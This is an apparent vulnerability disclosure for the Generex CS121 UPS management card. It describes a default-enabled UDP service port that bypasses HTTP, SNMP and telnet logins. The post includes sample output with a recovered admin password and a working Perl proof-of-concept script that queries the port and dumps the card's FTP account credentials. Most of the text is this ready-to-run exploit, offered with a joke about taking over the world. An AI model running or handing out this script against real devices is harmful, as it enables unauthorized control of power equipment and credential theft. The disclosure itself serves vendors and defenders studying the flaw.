UPS Web/SNMP-Manager CS121 by Generex comes in with a default enabled "service"-port, that makes it possible to bypass
any specified login for HTTP(s), snmp or telnet.
CS121 is a widely used management card in ups systems from Legrand, Rittal, Eaton, AEG, Masterguard....
Attached is a poc, found and proofed on Legrand ups with different firmware releases. If you are hardcore enough, you
may also flash your own HyNetOS-firmware and take over the world ;-)
./upssearch.pl $IP
UPS: <VERSION> CS124-16M32M, ROM-Version: 2.3.4(pduc) - Aug 27, 2010
Target system parameters (current):
Default Protocol : TCP/IP
Default Driver : Ethernet
Mac address : 00-03-05-00-00-00
IP address : XX.XX.XX.XX
Net Mask : 255.255.255.192
Default Gateway : XX.XX.XX.XX
DHCP : 0.0.0.0
DNS : 0.0.0.0
Port for tools : 4000
Searching login
USER: admin, PASS: hg478wegzsu, ACCOUNT: none
Regards.
#!/usr/bin/perl -w
use IO::Socket;
use constant MAXBYTES => scalar 1024;
$socket = IO::Socket::INET->new( PeerPort => 4000,
PeerAddr => $ARGV[0],
Type => SOCK_DGRAM,
Proto => 'udp');
$socket->send("<VERSION>");
$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n";
$socket->send("show syspar");
$socket->recv($inline, MAXBYTES);
print "$inline\n";
print "Searching login\n" ;
$socket->send("start");
$socket->recv($inline, MAXBYTES);
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt");
while($socket->recv($inline, MAXBYTES)) {
if($inline =~ /admin/ig) { print $inline; exit; }
}
sleep(1);
